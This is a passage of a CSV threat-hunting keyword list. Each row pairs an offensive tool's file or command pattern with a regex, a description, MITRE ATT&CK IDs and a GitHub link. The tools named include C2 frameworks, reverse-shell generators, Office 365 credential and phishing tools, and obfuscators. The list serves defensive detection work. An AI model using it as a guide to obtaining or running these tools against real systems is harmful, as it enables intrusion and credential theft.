tools","https://github.com/eeriedusk/nysm","1","1","N/A","10","3","205","36","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z" "*nyxgeek*",".{0,1000}nyxgeek.{0,1000}","offensive_tool_keyword","Github Username","github user hosting exploitation and recon tools","N/A","N/A","N/A","N/A","Information Gathering","https://github.com/nyxgeek","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nyxgeek/lyncsmash*",".{0,1000}nyxgeek\/lyncsmash.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*nyxgeek/ntlmscan*",".{0,1000}nyxgeek\/ntlmscan.{0,1000}","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","4","340","56","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z" "*nyxgeek/o365recon*",".{0,1000}nyxgeek\/o365recon.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","1","N/A","7","7","657","98","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*nyxgeek/teamstracker*",".{0,1000}nyxgeek\/teamstracker.{0,1000}","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","49","4","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" "*-o kitten.exe*",".{0,1000}\-o\s\skitten\.exe.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*o_getprivs*",".{0,1000}o_getprivs.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*o365-Attack-Toolkit*",".{0,1000}o365\-Attack\-Toolkit.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "*o365-attack-toolkit*",".{0,1000}o365\-attack\-toolkit.{0,1000}","offensive_tool_keyword","o365-attack-toolkit","A toolkit to attack Office365","T1110 - T1114 - T1119 - T1197 - T1087.002","TA0001 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/o365-attack-toolkit","1","1","N/A","10","10","991","211","2020-11-06T12:09:26Z","2019-07-22T10:39:46Z" "*o365creeper.git*",".{0,1000}o365creeper\.git.{0,1000}","offensive_tool_keyword","o365creeper","Python script that performs email address validation against Office 365 without submitting login attempts","T1592.002 - T1596","TA0007","N/A","N/A","Network Exploitation tools","https://github.com/LMGsec/o365creeper","1","1","N/A","N/A","4","307","61","2020-08-07T17:40:41Z","2019-07-12T21:32:05Z" "*o365creeper.py*",".{0,1000}o365creeper\.py.{0,1000}","offensive_tool_keyword","o365creeper","Python script that performs email address validation against Office 365 without submitting login attempts","T1592.002 - T1596","TA0007","N/A","N/A","Network Exploitation tools","https://github.com/LMGsec/o365creeper","1","1","N/A","N/A","4","307","61","2020-08-07T17:40:41Z","2019-07-12T21:32:05Z" "*o365creeper-master*",".{0,1000}o365creeper\-master.{0,1000}","offensive_tool_keyword","o365creeper","Python script that performs email address validation against Office 365 without submitting login attempts","T1592.002 - T1596","TA0007","N/A","N/A","Network Exploitation tools","https://github.com/LMGsec/o365creeper","1","1","N/A","N/A","4","307","61","2020-08-07T17:40:41Z","2019-07-12T21:32:05Z" "*o365enum.py*",".{0,1000}o365enum\.py.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","1","N/A","7","3","220","38","2024-04-12T21:42:47Z","2020-02-18T12:22:50Z" "*o365enum-master*",".{0,1000}o365enum\-master.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","1","N/A","7","3","220","38","2024-04-12T21:42:47Z","2020-02-18T12:22:50Z" "*o365recon.ps1*",".{0,1000}o365recon\.ps1.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","1","N/A","N/A","7","657","98","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*o365recon-master*",".{0,1000}o365recon\-master.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","1","N/A","N/A","7","657","98","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*oab-parse.py*",".{0,1000}oab\-parse\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*oaburl.py */*:*@* -e *",".{0,1000}oaburl\.py\s.{0,1000}\/.{0,1000}\:.{0,1000}\@.{0,1000}\s\-e\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*obfuscate.py grunt*",".{0,1000}obfuscate\.py\sgrunt.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*Obfuscate.py*",".{0,1000}Obfuscate\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*obfuscate/shellter*",".{0,1000}obfuscate\/shellter.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*obfuscate_cmdlet*",".{0,1000}obfuscate_cmdlet.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*obfuscate_command*",".{0,1000}obfuscate_command.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*obfuscated_module_source/*",".{0,1000}obfuscated_module_source\/.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1051","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*obfuscation.exe --*",".{0,1000}obfuscation\.exe\s\-\-.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*obfuscation.exe -f * -t *",".{0,1000}obfuscation\.exe\s\-f\s.{0,1000}\s\-t\s.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*obfuscator*antidisassembly.*",".{0,1000}obfuscator.{0,1000}antidisassembly\..{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1552","235","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*obfuscator.cpp*",".{0,1000}obfuscator\.cpp.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","0","N/A","10","10","1552","235","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*obfuskittiedump*",".{0,1000}obfuskittiedump.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*objects_constrained_delegation_full.txt*",".{0,1000}objects_constrained_delegation_full\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*objects_rbcd_delegation_full.txt*",".{0,1000}objects_rbcd_delegation_full\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","0","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*objects_unconstrained_delegation_full.txt*",".{0,1000}objects_unconstrained_delegation_full\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*objexec *.o*",".{0,1000}objexec\s.{0,1000}\.o.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*obscuritylabs*",".{0,1000}obscuritylabs.{0,1000}","offensive_tool_keyword","Github Username","resources for pentesters","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/obscuritylabs","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*obscuritylabs/ase:latest*",".{0,1000}obscuritylabs\/ase\:latest.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*obscuritylabs/RAI/*",".{0,1000}obscuritylabs\/RAI\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*octetsplicer/LAZYPARIAH*",".{0,1000}octetsplicer\/LAZYPARIAH.{0,1000}","offensive_tool_keyword","LAZYPARIAH","LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly","T1059 - T1566 - T1212 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/octetsplicer/LAZYPARIAH","1","1","N/A","N/A","2","139","30","2022-06-18T08:59:45Z","2020-11-20T05:08:36Z" "*Octoberfest7/JumpSession_BOF*",".{0,1000}Octoberfest7\/JumpSession_BOF.{0,1000}","offensive_tool_keyword","JumpSession_BOF","Beacon Object File allowing creation of Beacons in different sessions","T1055 - T1055.012 - T1548.002","TA0002 - TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/Octoberfest7/JumpSession_BOF","1","1","N/A","9","1","77","12","2022-05-23T22:23:33Z","2022-05-21T17:38:18Z" "*Octoberfest7/KDStab*",".{0,1000}Octoberfest7\/KDStab.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*Octoberfest7/TeamsPhisher*",".{0,1000}Octoberfest7\/TeamsPhisher.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","10","969","127","2024-04-23T14:52:03Z","2023-07-03T02:19:47Z" "*octopus.py *",".{0,1000}octopus\.py\s.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*OEP_Hiijack_Inject_Load*",".{0,1000}OEP_Hiijack_Inject_Load.{0,1000}","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","10","10","594","111","2023-12-28T15:23:19Z","2021-01-19T15:57:01Z" "*offensive_notion.exe*",".{0,1000}offensive_notion\.exe.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1049","114","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*offensive_notion_darwin_*",".{0,1000}offensive_notion_darwin_.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1049","114","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*offensive_notion_linux_*",".{0,1000}offensive_notion_linux_.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1049","114","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*offensive_notion_win_*.exe*",".{0,1000}offensive_notion_win_.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1049","114","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*OffensiveCSharp*DriverQuery*",".{0,1000}OffensiveCSharp.{0,1000}DriverQuery.{0,1000}","offensive_tool_keyword","DriverQuery","Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft","T1124 - T1057 - T1082","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*OffensiveCSharp*ETWEventSubscription*",".{0,1000}OffensiveCSharp.{0,1000}ETWEventSubscription.{0,1000}","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*OffensiveCSharp-master*",".{0,1000}OffensiveCSharp\-master.{0,1000}","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*OffensiveLua-main*",".{0,1000}OffensiveLua\-main.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*office2john.py*",".{0,1000}office2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*office365userenum.*",".{0,1000}office365userenum\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" 